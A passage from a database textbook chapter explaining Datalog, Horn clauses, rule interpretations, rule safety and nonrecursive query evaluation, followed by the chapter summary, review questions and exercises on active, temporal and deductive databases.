X<3. Note that because the domains of these predicates are potentially infinite, they should be used with care in rule definitions. For example, the predicate greater(X, 3), if used alone, generates an infinite set of values for X that satisfy the predicate (all integer numbers greater than 3). A literal is either an atomic formula as defined earlier—called a positive literal—or an atomic formula preceded by not. The latter is a negated atomic formula, called a negative literal. Datalog programs can be considered to be a subset of the predicate calculus formulas, which are somewhat similar to the formulas of the domain rela- tional calculus. In Datalog, however, these formulas are first converted into what is known as clausal form before they are expressed in Datalog, and only formulas given in a restricted clausal form, called Horn clauses,32 can be used in Datalog. 32Named after the mathematician Alfred Horn. 971 Enhanced Data Models for Advanced Applications 5.4 Clausal Form and Horn Clauses Recall that a formula in the relational calculus is a condition that includes predicates called atoms (based on relation names). Additionally, a formula can have quanti- fiers—namely, the universal quantifier (for all) and the existential quantifier (there exists). In clausal form, a formula must be transformed into another formula with the following characteristics: ■ All variables in the formula are universally quantified. Hence, it is not neces- sary to include the universal quantifiers (for all) explicitly; the quantifiers are removed, and all variables in the formula are implicitly quantified by the uni- versal quantifier. ■ In clausal form, the formula is made up of a number of clauses, where each clause is composed of a number of literals connected by OR logical connec- tives only. Hence, each clause is a disjunction of literals. ■ The clauses themselves are connected by AND logical connectives only, to form a formula. Hence, the clausal form of a formula is a conjunction of clauses. It can be shown that any formula can be converted into clausal form. For our pur- poses, we are mainly interested in the form of the individual clauses, each of which is a disjunction of literals. Recall that literals can be positive literals or negative liter- als. Consider a clause of the form: NOT(P1) OR NOT(P2) OR ... OR NOT(Pn) OR Q1 OR Q2 OR ... OR Qm (1) This clause has n negative literals and m positive literals. Such a clause can be trans- formed into the following equivalent logical formula: P1 AND P2 AND ... AND Pn ⇒ Q1 OR Q2 OR ... OR Qm (2) where ⇒ is the implies symbol. The formulas (1) and (2) are equivalent, meaning that their truth values are always the same. This is the case because if all the Pi liter- als (i = 1, 2, ..., n) are true, the formula (2) is true only if at least one of the Qi’s is true, which is the meaning of the ⇒ (implies) symbol. For formula (1), if all the Pi literals (i = 1, 2, ..., n) are true, their negations are all false; so in this case formula (1) is true only if at least one of the Qi’s is true. In Datalog, rules are expressed as a restricted form of clauses called Horn clauses, in which a clause can contain at most one positive literal. Hence, a Horn clause is either of the form NOT (P1) OR NOT(P2) OR ... OR NOT(Pn) OR Q (3) or of the form NOT (P1) OR NOT(P2) OR ... OR NOT(Pn) (4) The Horn clause in (3) can be transformed into the clause P1 AND P2 AND ... AND Pn ⇒ Q (5) which is written in Datalog as the following rule: Q :– P1, P2, ..., Pn. (6) 972 Enhanced Data Models for Advanced Applications 1. SUPERIOR(X, Y ) :– SUPERVISE(X, Y ). (rule 1) 2. SUPERIOR(X, Y ) :– SUPERVISE(X, Z ), SUPERIOR(Z, Y ). (rule 2) 3. SUPERVISE(jennifer, ahmad). (ground axiom, given) 4. SUPERVISE(james, jennifer). (ground axiom, given) 5. SUPERIOR(jennifer, ahmad). (apply rule 1 on 3) 6. SUPERIOR(james, ahmad). (apply rule 2 on 4 and 5) Figure 12 Proving a new fact. The Horn clause in (4) can be transformed into P1 AND P2 AND ... AND Pn ⇒ (7) which is written in Datalog as follows: P1, P2, ..., Pn. (8) A Datalog rule, as in (6), is hence a Horn clause, and its meaning, based on formula (5), is that if the predicates P1 AND P2 AND ... AND Pn are all true for a particular binding to their variable arguments, then Q is also true and can hence be inferred. The Datalog expression (8) can be considered as an integrity constraint, where all the predicates must be true to satisfy the query. In general, a query in Datalog consists of two components: ■ A Datalog program, which is a finite set of rules ■ A literal P(X1, X2, ..., Xn), where each Xi is a variable or a constant A Prolog or Datalog system has an internal inference engine that can be used to process and compute the results of such queries. Prolog inference engines typically return one result to the query (that is, one set of values for the variables in the query) at a time and must be prompted to return additional results. On the con- trary, Datalog returns results set-at-a-time. 5.5 Interpretations of Rules There are two main alternatives for interpreting the theoretical meaning of rules: proof-theoretic and model-theoretic. In practical systems, the inference mechanism within a system defines the exact interpretation, which may not coincide with either of the two theoretical interpretations. The inference mechanism is a computational procedure and hence provides a computational interpretation of the meaning of rules. In this section, first we discuss the two theoretical interpretations. Then we briefly discuss inference mechanisms as a way of defining the meaning of rules. In the proof-theoretic interpretation of rules, we consider the facts and rules to be true statements, or axioms. Ground axioms contain no variables. The facts are ground axioms that are given to be true. Rules are called deductive axioms, since they can be used to deduce new facts. The deductive axioms can be used to con- struct proofs that derive new facts from existing facts. For example, Figure 12 shows how to prove the fact SUPERIOR(james, ahmad) from the rules and facts given in 973 Enhanced Data Models for Advanced Applications Figure 11. The proof-theoretic interpretation gives us a procedural or computa- tional approach for computing an answer to the Datalog query. The process of proving whether a certain fact (theorem) holds is known as theorem proving. The second type of interpretation is called the model-theoretic interpretation. Here, given a finite or an infinite domain of constant values,33 we assign to a predi- cate every possible combination of values as arguments. We must then determine whether the predicate is true or false. In general, it is sufficient to specify the combi- nations of arguments that make the predicate true, and to state that all other combi- nations make the predicate false. If this is done for every predicate, it is called an interpretation of the set of predicates. For example, consider the interpretation shown in Figure 13 for the predicates SUPERVISE and SUPERIOR. This interpreta- tion assigns a truth value (true or false) to every possible combination of argument values (from a finite domain) for the two predicates. An interpretation is called a model for a specific set of rules if those rules are always true under that interpretation; that is, for any values assigned to the variables in the rules, the head of the rules is true when we substitute the truth values assigned to the predicates in the body of the rule by that interpretation. Hence, whenever a par- ticular substitution (binding) to the variables in the rules is applied, if all the predi- cates in the body of a rule are true under the interpretation, the predicate in the head of the rule must also be true. The interpretation shown in Figure 13 is a model for the two rules shown, since it can never cause the rules to be violated. Notice that a rule is violated if a particular binding of constants to the variables makes all the predicates in the rule body true but makes the predicate in the rule head false. For example, if SUPERVISE(a, b) and SUPERIOR(b, c) are both true under some inter- pretation, but SUPERIOR(a, c) is not true, the interpretation cannot be a model for the recursive rule: SUPERIOR(X, Y) :– SUPERVISE(X, Z), SUPERIOR(Z, Y) In the model-theoretic approach, the meaning of the rules is established by provid- ing a model for these rules. A model is called a minimal model for a set of rules if we cannot change any fact from true to false and still get a model for these rules. For example, consider the interpretation in Figure 13, and assume that the SUPERVISE predicate is defined by a set of known facts, whereas the SUPERIOR predicate is defined as an interpretation (model) for the rules. Suppose that we add the predi- cate SUPERIOR(james, bob) to the true predicates. This remains a model for the rules shown, but it is not a minimal model, since changing the truth value of SUPERIOR(james,bob) from true to false still provides us with a model for the rules. The model shown in Figure 13 is the minimal model for the set of facts that are defined by the SUPERVISE predicate. In general, the minimal model that corresponds to a given set of facts in the model- theoretic interpretation should be the same as the facts generated by the proof- 33The most commonly chosen domain is finite and is called the Herbrand Universe. 974 Enhanced Data Models for Advanced Applications Rules SUPERIOR(X, Y ) :– SUPERVISE(X, Y ). SUPERIOR(X, Y ) :– SUPERVISE(X, Z ), SUPERIOR(Z, Y ). Interpretation Known Facts: SUPERVISE(franklin, john) is true. SUPERVISE(franklin, ramesh) is true. SUPERVISE(franklin, joyce) is true. SUPERVISE(jennifer, alicia) is true. SUPERVISE(jennifer, ahmad) is true. SUPERVISE(james, franklin) is true. SUPERVISE(james, jennifer) is true. SUPERVISE(X, Y ) is false for all other possible (X, Y ) combinations Derived Facts: SUPERIOR(franklin, john) is true. SUPERIOR(franklin, ramesh) is true. SUPERIOR(franklin, joyce) is true. SUPERIOR(jennifer, alicia) is true. SUPERIOR(jennifer, ahmad) is true. SUPERIOR(james, franklin) is true. SUPERIOR(james, jennifer) is true. SUPERIOR(james, john) is true. SUPERIOR(james, ramesh) is true. SUPERIOR(james, joyce) is true. SUPERIOR(james, alicia) is true. SUPERIOR(james, ahmad) is true. SUPERIOR(X, Y ) is false for all other possible (X, Y ) combinations Figure 13 An interpretation that is a minimal model. theoretic interpretation for the same original set of ground and deductive axioms. However, this is generally true only for rules with a simple structure. Once we allow negation in the specification of rules, the correspondence between interpretations does not hold. In fact, with negation, numerous minimal models are possible for a given set of facts. A third approach to interpreting the meaning of rules involves defining an inference mechanism that is used by the system to deduce facts from the rules. This inference mechanism would define a computational interpretation to the meaning of the rules. The Prolog logic programming language uses its inference mechanism to define the meaning of the rules and facts in a Prolog program. Not all Prolog pro- grams correspond to the proof-theoretic or model-theoretic interpretations; it depends on the type of rules in the program. However, for many simple Prolog pro- grams, the Prolog inference mechanism infers the facts that correspond either to the proof-theoretic interpretation or to a minimal model under the model-theoretic interpretation. 975 Enhanced Data Models for Advanced Applications EMPLOYEE(john). MALE(john). EMPLOYEE(franklin). MALE(franklin). EMPLOYEE(aIicia). MALE(ramesh). EMPLOYEE(jennifer). MALE(ahmad). EMPLOYEE(ramesh). MALE(james). EMPLOYEE(joyce). EMPLOYEE(ahmad). FEMALE(alicia). EMPLOYEE(james). FEMALE(jennifer). FEMALE(joyce). SALARY(john, 30000). SALARY(franklin, 40000). PROJECT(productx). SALARY(alicia, 25000). PROJECT(producty). SALARY(jennifer, 43000). PROJECT(productz). SALARY(ramesh, 38000). PROJECT(computerization). SALARY(joyce, 25000). PROJECT(reorganization). SALARY(ahmad, 25000). PROJECT(newbenefits). SALARY(james, 55000). WORKS_ON(john, productx, 32). DEPARTMENT(john, research). WORKS_ON(john, producty, 8). DEPARTMENT(franklin, research). WORKS_ON(ramesh, productz, 40). DEPARTMENT(alicia, administration). WORKS_ON(joyce, productx, 20). DEPARTMENT(jennifer, administration). WORKS_ON(joyce, producty, 20). DEPARTMENT(ramesh, research). WORKS_ON(franklin, producty, 10). DEPARTMENT(joyce, research). WORKS_ON(franklin, productz, 10). DEPARTMENT(ahmad, administration). WORKS_ON(franklin, computerization, 10). DEPARTMENT(james, headquarters). WORKS_ON(franklin, reorganization, 10). WORKS_ON(alicia, newbenefits, 30). SUPERVISE(franklln, john). WORKS_ON(alicia, computerization, 10). SUPERVISE(franklln, ramesh) WORKS_ON(ahmad, computerization, 35). SUPERVISE(frankin , joyce). WORKS_ON(ahmad, newbenefits, 5). SUPERVISE(jennifer, aIicia). WORKS_ON(jennifer, newbenefits, 20). SUPERVISE(jennifer, ahmad). WORKS_ON(jennifer, reorganization, 15). SUPERVISE(james, franklin). WORKS_ON(james, reorganization, 10). SUPERVISE(james, jennifer). Figure 14 Fact predicates for part of the database from Figure A.1. 5.6 Datalog Programs and Their Safety There are two main methods of defining the truth values of predicates in actual Datalog programs. Fact-defined predicates (or relations) are defined by listing all the combinations of values (the tuples) that make the predicate true. These corre- spond to base relations whose contents are stored in a database system. Figure 14 shows the fact-defined predicates EMPLOYEE, MALE, FEMALE, DEPARTMENT, SUPERVISE, PROJECT, and WORKS_ON, which correspond to part of the relational database shown in Figure A.1. Rule-defined predicates (or views) are defined by being the head (LHS) of one or more Datalog rules; they correspond to virtual rela- 976 Enhanced Data Models for Advanced Applications SUPERIOR(X, Y ) :– SUPERVISE(X, Y ). SUPERIOR(X, Y ) :– SUPERVISE(X, Z ), SUPERIOR(Z, Y ). SUBORDINATE(X, Y ) :– SUPERIOR(Y, X ). SUPERVISOR(X ) :– EMPLOYEE(X ), SUPERVISE(X, Y ). OVER_40K_EMP(X ) :– EMPLOYEE(X ), SALARY(X, Y ), Y >= 40000.
UNDER_40K_SUPERVISOR(X ) :– SUPERVISOR(X ), NOT(OVER_40_K_EMP(X )).
MAIN_PRODUCTX_EMP(X ) :– EMPLOYEE(X ), WORKS_ON(X, productx, Y ), Y >=20.
PRESIDENT(X ) :– EMPLOYEE(X), NOT(SUPERVISE(Y, X ) ).

Figure 15
Rule-defined predicates.

tions whose contents can be inferred by the inference engine. Figure 15 shows a
number of rule-defined predicates.

A program or a rule is said to be safe if it generates a finite set of facts. The general
theoretical problem of determining whether a set of rules is safe is undecidable.
However, one can determine the safety of restricted forms of rules. For example, the
rules shown in Figure 16 are safe. One situation where we get unsafe rules that can
generate an infinite number of facts arises when one of the variables in the rule can
range over an infinite domain of values, and that variable is not limited to ranging
over a finite relation. For example, consider the following rule:

BIG_SALARY(Y ) :– Y>60000

Here, we can get an infinite result if Y ranges over all possible integers. But suppose
that we change the rule as follows:

BIG_SALARY(Y ) :– EMPLOYEE(X), Salary(X, Y ), Y>60000

In the second rule, the result is not infinite, since the values that Y can be bound to
are now restricted to values that are the salary of some employee in the database—
presumably, a finite set of values. We can also rewrite the rule as follows:

BIG_SALARY(Y ) :– Y>60000, EMPLOYEE(X ), Salary(X, Y )

In this case, the rule is still theoretically safe. However, in Prolog or any other system
that uses a top-down, depth-first inference mechanism, the rule creates an infinite
loop, since we first search for a value for Y and then check whether it is a salary of an
employee. The result is generation of an infinite number of Y values, even though
these, after a certain point, cannot lead to a set of true RHS predicates. One defini-
tion of Datalog considers both rules to be safe, since it does not depend on a partic-
ular inference mechanism. Nonetheless, it is generally advisable to write such a rule
in the safest form, with the predicates that restrict possible bindings of variables
placed first. As another example of an unsafe rule, consider the following rule:

HAS_SOMETHING(X, Y ) :– EMPLOYEE(X )

977

Enhanced Data Models for Advanced Applications

REL_ONE(A, B, C ).
REL_TWO(D, E, F ).
REL_THREE(G, H, I, J ).

SELECT_ONE_A_EQ_C(X, Y, Z ) :– REL_ONE(C, Y, Z ).
SELECT_ONE_B_LESS_5(X, Y, Z ) :– REL_ONE(X, Y, Z ), Y< 5. SELECT_ONE_A_EQ_C_AND_B_LESS_5(X, Y, Z ) :– REL_ONE(C, Y, Z ), Y<5 SELECT_ONE_A_EQ_C_OR_B_LESS_5(X, Y, Z ) :– REL_ONE(C, Y, Z ). SELECT_ONE_A_EQ_C_OR_B_LESS_5(X, Y, Z ) :– REL_ONE(X, Y, Z ), Y<5. PROJECT_THREE_ON_G_H(W, X ) :– REL_THREE(W, X, Y, Z ). UNION_ONE_TWO(X, Y, Z ) :– REL_ONE(X, Y, Z ). UNION_ONE_TWO(X, Y, Z ) :– REL_TWO(X, Y, Z ). INTERSECT_ONE_TWO(X, Y, Z ) :– REL_ONE(X, Y, Z ), REL_TWO(X, Y, Z ). DIFFERENCE_TWO_ONE(X, Y, Z ) :– REL_TWO(X, Y, Z ) NOT(REL_ONE(X, Y, Z ). CART PROD _ONE_THREE(T, U, V, W, X, Y, Z ) :– REL_ONE(T, U, V), REL_THREE(W, X, Y, Z ). NATURAL_JOIN_ONE_THREE_C_EQ_G(U, V, W, X, Y, Z ) :– REL_ONE(U, V, W ), REL_THREE(W, X, Y, Z ). Figure 16 Predicates for illustrating relational operations. Here, an infinite number of Y values can again be generated, since the variable Y appears only in the head of the rule and hence is not limited to a finite set of values. To define safe rules more formally, we use the concept of a limited variable. A vari- able X is limited in a rule if (1) it appears in a regular (not built-in) predicate in the body of the rule; (2) it appears in a predicate of the form X=c or c=X or (c1<<=X and X<=c2) in the rule body, where c, c1, and c2 are constant values; or (3) it appears in a predicate of the form X=Y or Y=X in the rule body, where Y is a limited vari- able. A rule is said to be safe if all its variables are limited. 5.7 Use of Relational Operations It is straightforward to specify many operations of the relational algebra in the form of Datalog rules that define the result of applying these operations on the database relations (fact predicates). This means that relational queries and views can easily be specified in Datalog. The additional power that Datalog provides is in the specifica- tion of recursive queries, and views based on recursive queries. In this section, we 978 Enhanced Data Models for Advanced Applications show how some of the standard relational operations can be specified as Datalog rules. Our examples will use the base relations (fact-defined predicates) REL_ONE, REL_TWO, and REL_THREE, whose schemas are shown in Figure 16. In Datalog, we do not need to specify the attribute names as in Figure 16; rather, the arity (degree) of each predicate is the important aspect. In a practical system, the domain (data type) of each attribute is also important for operations such as UNION, INTERSECTION, and JOIN, and we assume that the attribute types are compatible for the various operations. Figure 16 illustrates a number of basic relational operations. Notice that if the Datalog model is based on the relational model and hence assumes that predicates (fact relations and query results) specify sets of tuples, duplicate tuples in the same predicate are automatically eliminated. This may or may not be true, depending on the Datalog inference engine. However, it is definitely not the case in Prolog, so any of the rules in Figure 16 that involve duplicate elimination are not correct for Prolog. For example, if we want to specify Prolog rules for the UNION operation with duplicate elimination, we must rewrite them as follows: UNION_ONE_TWO(X, Y, Z) :– REL_ONE(X, Y, Z). UNION_ONE_TWO(X, Y, Z) :– REL_TWO(X, Y, Z), NOT(REL_ONE(X, Y, Z)). However, the rules shown in Figure 16 should work for Datalog, if duplicates are automatically eliminated. Similarly, the rules for the PROJECT operation shown in Figure 16 should work for Datalog in this case, but they are not correct for Prolog, since duplicates would appear in the latter case. 5.8 Evaluation of Nonrecursive Datalog Queries In order to use Datalog as a deductive database system, it is appropriate to define an inference mechanism based on relational database query processing concepts. The inherent strategy involves a bottom-up evaluation, starting with base relations; the order of operations is kept flexible and subject to query optimization. In this section we discuss an inference mechanism based on relational operations that can be applied to nonrecursive Datalog queries. We use the fact and rule base shown in Figures 14 and 15 to illustrate our discussion. If a query involves only fact-defined predicates, the inference becomes one of searching among the facts for the query result. For example, a query such as DEPARTMENT(X, Research)? is a selection of all employee names X who work for the Research department. In relational algebra, it is the query: π$1 (σ$2 = “Research” (DEPARTMENT)) which can be answered by searching through the fact-defined predicate department(X,Y ). The query involves relational SELECT and PROJECT operations on a base relation, and it can be handled by algorithmic database query processing and optimization techniques. 979 Enhanced Data Models for Advanced Applications SUPERVISOR UNDER_40K_SUPERVISOR OVER_40K_EMP PRESIDENT MAIN_PRODUCT_EMP WORKS_ON EMPLOYEE SALARY SUPERVISE DEPARTMENT PROJECT FEMALE MALE SUBORDINATE SUPERIOR Figure 17 Predicate dependency graph for Figures 15 and 16. When a query involves rule-defined predicates, the inference mechanism must compute the result based on the rule definitions. If a query is nonrecursive and involves a predicate p that appears as the head of a rule p :– p1, p2, ..., pn, the strategy is first to compute the relations corresponding to p1, p2, ..., pn and then to compute the relation corresponding to p. It is useful to keep track of the dependency among the predicates of a deductive database in a predicate dependency graph. Figure 17 shows the graph for the fact and rule predicates shown in Figures 14 and 15. The dependency graph contains a node for each predicate. Whenever a predicate A is specified in the body (RHS) of a rule, and the head (LHS) of that rule is the predi- cate B, we say that B depends on A, and we draw a directed edge from A to B. This indicates that in order to compute the facts for the predicate B (the rule head), we must first compute the facts for all the predicates A in the rule body. If the depend- ency graph has no cycles, we call the rule set nonrecursive. If there is at least one cycle, we call the rule set recursive. In Figure 17, there is one recursively defined predicate—namely, SUPERIOR—which has a recursive edge pointing back to itself. Additionally, because the predicate subordinate depends on SUPERIOR, it also requires recursion in computing its result. A query that includes only nonrecursive predicates is called a nonrecursive query. In this section we discuss only inference mechanisms for nonrecursive queries. In Figure 17, any query that does not involve the predicates SUBORDINATE or SUPERIOR is nonrecursive. In the predicate dependency graph, the nodes corre- sponding to fact-defined predicates do not have any incoming edges, since all fact- defined predicates have their facts stored in a database relation. The contents of a fact-defined predicate can be computed by directly retrieving the tuples in the cor- responding database relation. 980 Enhanced Data Models for Advanced Applications The main function of an inference mechanism is to compute the facts that corre- spond to query predicates. This can be accomplished by generating a relational expression involving relational operators as SELECT, PROJECT, JOIN, UNION, and SET DIFFERENCE (with appropriate provision for dealing with safety issues) that, when executed, provides the query result. The query can then be executed by utiliz- ing the internal query processing and optimization operations of a relational data- base management system. Whenever the inference mechanism needs to compute the fact set corresponding to a nonrecursive rule-defined predicate p, it first locates all the rules that have p as their head. The idea is to compute the fact set for each such rule and then to apply the UNION operation to the results, since UNION corre- sponds to a logical OR operation. The dependency graph indicates all predicates q on which each p depends, and since we assume that the predicate is nonrecursive, we can always determine a partial order among such predicates q. Before computing the fact set for p, first we compute the fact sets for all predicates q on which p depends, based on their partial order. For example, if a query involves the predicate UNDER_40K_SUPERVISOR, we must first compute both SUPERVISOR and OVER_40K_EMP. Since the latter two depend only on the fact-defined predicates EMPLOYEE, SALARY, and SUPERVISE, they can be computed directly from the stored database relations. This concludes our introduction to deductive databases. We have included an exten- sive bibliography of work in deductive databases, recursive query processing, magic sets, combination of relational databases with deductive rules, and GLUE-NAIL! System at the end of this chapter. 6 Summary In this chapter we introduced database concepts for some of the common features that are needed by advanced applications: active databases, temporal databases, spa- tial databases, multimedia databases, and deductive databases. It is important to note that each of these is a broad topic and warrants a complete textbook. First we introduced the topic of active databases, which provide additional func- tionality for specifying active rules. We introduced the Event-Condition-Action (ECA) model for active databases. The rules can be automatically triggered by events that occur—such as a database update—and they can initiate certain actions that have been specified in the rule declaration if certain conditions are true. Many commercial packages have some of the functionality provided by active databases in the form of triggers. We discussed the different options for specifying rules, such as row-level versus statement-level, before versus after, and immediate versus deferred. We gave examples of row-level triggers in the Oracle commercial system, and statement-level rules in the STARBURST experimental system. The syntax for trig- gers in the SQL-99 standard was also discussed. We briefly discussed some design issues and some possible applications for active databases. 981 Enhanced Data Models for Advanced Applications Next we introduced some of the concepts of temporal databases, which permit the database system to store a history of changes and allow users to query both current and past states of the database. We discussed how time is represented and distin- guished between the valid time and transaction time dimensions. We discussed how valid time, transaction time, and bitemporal relations can be implemented using tuple versioning in the relational model, with examples to illustrate how updates, inserts, and deletes are implemented. We also showed how complex objects can be used to implement temporal databases using attribute versioning. We looked at some of the querying operations for temporal relational databases and gave a brief introduction to the TSQL2 language. Then we turned to spatial databases. Spatial databases provide concepts for data- bases that keep track of objects that have spatial characteristics. We discussed the types of spatial data, types of operators for processing spatial data, types of spatial queries, and spatial indexing techniques, including the popular R-trees. Then we discussed some spatial data mining techniques and applications of spatial data. We discussed some basic types of multimedia databases and their important char- acteristics. Multimedia databases provide features that allow users to store and query different types of multimedia information, which includes images (such as pictures and drawings), video clips (such as movies, newsreels, and home videos), audio clips (such as songs, phone messages, and speeches), and documents (such as books and articles). We provided a brief overview of the various types of media sources and how multimedia sources may be indexed. Images are an extremely com- mon type of data among databases today and are likely to occupy a large proportion of stored data in databases. We therefore provided a more detailed treatment of images: their automatic analysis, recognition of objects within images, and their semantic tagging—all of which contribute to developing better systems to retrieve images by content, which still remains a challenging problem. We also commented on the analysis of audio data sources. We concluded the chapter with an introduction to deductive databases. We gave an overview of Prolog and Datalog notation. We discussed the clausal form of formu- las. Datalog rules are restricted to Horn clauses, which contain at most one positive literal. We discussed the proof-theoretic and model-theoretic interpretation of rules. We briefly discussed Datalog rules and their safety and the ways of expressing relational operators using Datalog rules. Finally, we discussed an inference mecha- nism based on relational operations that can be used to evaluate nonrecursive Datalog queries using relational query optimization techniques. While Datalog has been a popular language with many applications, unfortunately, implementations of deductive database systems such as LDL or VALIDITY have not become widely commercially available. 982 Enhanced Data Models for Advanced Applications Review Questions 1. What are the differences between row-level and statement-level active rules? 2. What are the differences among immediate, deferred, and detached consideration of active rule conditions? 3. What are the differences among immediate, deferred, and detached execution of active rule actions? 4. Briefly discuss the consistency and termination problems when designing a set of active rules. 5. Discuss some applications of active databases. 6. Discuss how time is represented in temporal databases and compare the dif- ferent time dimensions. 7. What are the differences between valid time, transaction time, and bitempo- ral relations? 8. Describe how the insert, delete, and update commands should be imple- mented on a valid time relation. 9. Describe how the insert, delete, and update commands should be imple- mented on a bitemporal relation. 10. Describe how the insert, delete, and update commands should be imple- mented on a transaction time relation. 11. What are the main differences between tuple versioning and attribute ver- sioning? 12. How do spatial databases differ from regular databases? 13. What are the different types of spatial data? 14. Name the main types of spatial operators and different classes of spatial queries. 15. What are the properties of R-trees that act as an index for spatial data? 16. Describe how a spatial join index between spatial objects can be constructed. 17. What are the different types of spatial data mining? 18. State the general form of a spatial association rule. Give an example of a spa- tial association rule. 19. What are the different types of multimedia sources? 20. How are multimedia sources indexed for content-based retrieval? 983 Enhanced Data Models for Advanced Applications 21. What important features of images are used to compare them? 22. What are the different approaches to recognizing objects in images? 23. How is semantic tagging of images used? 24. What are the difficulties in analyzing audio sources? 25. What are deductive databases? 26. Write sample rules in Prolog to define that courses with course number above CS5000 are graduate courses and that DBgrads are those graduate stu- dents who enroll in CS6400 and CS8803. 27. Define clausal form of formulas and Horn clauses. 28. What is theorem proving and what is proof-theoretic interpretation of rules? 29. What is model-theoretic interpretation and how does it differ from proof- theoretic interpretation? 30. What are fact-defined predicates and rule-defined predicates? 31. What is a safe rule? 32. Give examples of rules that can define relational operations SELECT, PROJECT, JOIN, and SET operations. 33. Discuss the inference mechanism based on relational operations that can be applied to evaluate nonrecursive Datalog queries. Exercises 34. Consider the COMPANY database described in Figure A.1. Using the syntax of Oracle triggers, write active rules to do the following: a. Whenever an employee’s project assignments are changed, check if the total hours per week spent on the employee’s projects are less than 30 or greater than 40; if so, notify the employee’s direct supervisor. b. Whenever an employee is deleted, delete the PROJECT tuples and DEPENDENT tuples related to that employee, and if the employee man- ages a department or supervises employees, set the Mgr_ssn for that department to NULL and set the Super_ssn for those employees to NULL. 35. Repeat 34 but use the syntax of STARBURST active rules. 36. Consider the relational schema shown in Figure 18. Write active rules for keeping the Sum_commissions attribute of SALES_PERSON equal to the sum of the Commission attribute in SALES for each sales person. Your rules should also check if the Sum_commissions exceeds 100000; if it does, call a procedure Notify_manager(S_id). Write both statement-level rules in STARBURST nota- tion and row-level rules in Oracle. 984 Enhanced Data Models for Advanced Applications S_id V_id Commission SALES Salesperson_id Name Title Phone Sum_commissions SALES_PERSON Figure 18 Database schema for sales and salesperson commissions in Exercise 36. 37. Consider the UNIVERSITY EER schema in Figure A.2. Write some rules (in English) that could be implemented via active rules to enforce some com- mon integrity constraints that you think are relevant to this application. 38. Discuss which of the updates that created each of the tuples shown in Figure 9 were applied retroactively and which were applied proactively. 39. Show how the following updates, if applied in sequence, would change the contents of the bitemporal EMP_BT relation in Figure 9. For each update, state whether it is a retroactive or proactive update. a. On 2004-03-10,17:30:00, the salary of Narayan is updated to 40000, effec- tive on 2004-03-01. b. On 2003-07-30,08:31:00, the salary of Smith was corrected to show that it should have been entered as 31000 (instead of 30000 as shown), effective on 2003-06-01. c. On 2004-03-18,08:31:00, the database was changed to indicate that Narayan was leaving the company (that is, logically deleted) effective on 2004-03-31. d. On 2004-04-20,14:07:33, the database was changed to indicate the hiring of a new employee called Johnson, with the tuple <‘Johnson’, ‘334455667’, 1, NULL > effective on 2004-04-20.

e. On 2004-04-28,12:54:02, the database was changed to indicate that Wong
was leaving the company (that is, logically deleted) effective on 2004-06-
01.

f. On 2004-05-05,13:07:33, the database was changed to indicate the rehir-
ing of Brown, with the same department and supervisor but with salary
35000 effective on 2004-05-01.

40. Show how the updates given in Exercise 39, if applied in sequence, would
change the contents of the valid time EMP_VT relation in Figure 8.

41. Add the following facts to the sample database in Figure 11:

SUPERVISE(ahmad, bob), SUPERVISE(franklin, gwen).

First modify the supervisory tree in Figure 11(b) to reflect this change. Then
construct a diagram showing the top-down evaluation of the query
SUPERIOR(james, Y) using rules 1 and 2 from Figure 12.

985

Enhanced Data Models for Advanced Applications

42. Consider the following set of facts for the relation PARENT(X, Y), where Y is
the parent of X:

PARENT(a, aa), PARENT(a, ab), PARENT(aa, aaa), PARENT(aa, aab),
PARENT(aaa, aaaa), PARENT(aaa, aaab).

Consider the rules

r1: ANCESTOR(X, Y) :– PARENT(X, Y)
r2: ANCESTOR(X, Y) :– PARENT(X, Z), ANCESTOR(Z, Y)

which define ancestor Y of X as above.

a. Show how to solve the Datalog query

ANCESTOR(aa, X)?

and show your work at each step.

b. Show the same query by computing only the changes in the ancestor rela-
tion and using that in rule 2 each time.

[This question is derived from Bancilhon and Ramakrishnan (1986).]

43. Consider a deductive database with the following rules:

ANCESTOR(X, Y) :– FATHER(X, Y)
ANCESTOR(X, Y) :– FATHER(X, Z), ANCESTOR(Z, Y)

Notice that FATHER(X, Y) means that Y is the father of X; ANCESTOR(X, Y)
means that Y is the ancestor of X.

Consider the following fact base:

FATHER(Harry, Issac), FATHER(Issac, John), FATHER(John, Kurt).

a. Construct a model-theoretic interpretation of the above rules using the
given facts.

b. Consider that a database contains the above relations FATHER(X, Y ),
another relation BROTHER(X, Y ), and a third relation BIRTH(X, B ),
where B is the birth date of person X. State a rule that computes the first
cousins of the following variety: their fathers must be brothers.

c. Show a complete Datalog program with fact-based and rule-based literals
that computes the following relation: list of pairs of cousins, where the
first person is born after 1960 and the second after 1970. You may use
greater than as a built-in predicate. (Note: Sample facts for brother, birth,
and person must also be shown.)

44. Consider the following rules:

REACHABLE(X, Y) :– FLIGHT(X, Y)
REACHABLE(X, Y) :– FLIGHT(X, Z), REACHABLE(Z, Y)

where REACHABLE(X, Y) means that city Y can be reached from city X, and
FLIGHT(X, Y) means that there is a flight to city Y from city X.

986

Enhanced Data Models for Advanced Applications

a. Construct fact predicates that describe the following:

i. Los Angeles, New York, Chicago, Atlanta, Frankfurt, Paris, Singapore,
Sydney are cities.

ii. The following flights exist: LA to NY, NY to Atlanta, Atlanta to
Frankfurt, Frankfurt to Atlanta, Frankfurt to Singapore, and
Singapore to Sydney. (Note: No flight in reverse direction can be auto-
matically assumed.)

b. Is the given data cyclic? If so, in what sense?

c. Construct a model-theoretic interpretation (that is, an interpretation
similar to the one shown in Figure 13) of the above facts and rules.

d. Consider the query

REACHABLE(Atlanta, Sydney)?

How will this query be executed? List the series of steps it will go through.

e. Consider the following rule-defined predicates:

ROUND-TRIP-REACHABLE(X, Y) :–
REACHABLE(X, Y), REACHABLE(Y, X)

DURATION(X, Y, Z)

Draw a predicate dependency graph for the above predicates. (Note:
DURATION(X, Y, Z) means that you can take a flight from X to Y in Z
hours.)

f. Consider the following query: What cities are reachable in 12 hours from
Atlanta? Show how to express it in Datalog. Assume built-in predicates
like greater-than(X, Y). Can this be converted into a relational algebra
statement in a straightforward way? Why or why not?

g. Consider the predicate population(X, Y), where Y is the population of
city X. Consider the following query: List all possible bindings of the
predicate pair (X, Y), where Y is a city that can be reached in two flights
from city X, which has over 1 million people. Show this query in Datalog.
Draw a corresponding query tree in relational algebraic terms.

Selected Bibliography
The book by Zaniolo et al. (1997) consists of several parts, each describing an
advanced database concept such as active, temporal, and spatial/text/multimedia
databases. Widom and Ceri (1996) and Ceri and Fraternali (1997) focus on active
database concepts and systems. Snodgrass (1995) describes the TSQL2 language
and data model. Khoshafian and Baker (1996), Faloutsos (1996), and
Subrahmanian (1998) describe multimedia database concepts. Tansel et al. (1993) is
a collection of chapters on temporal databases.

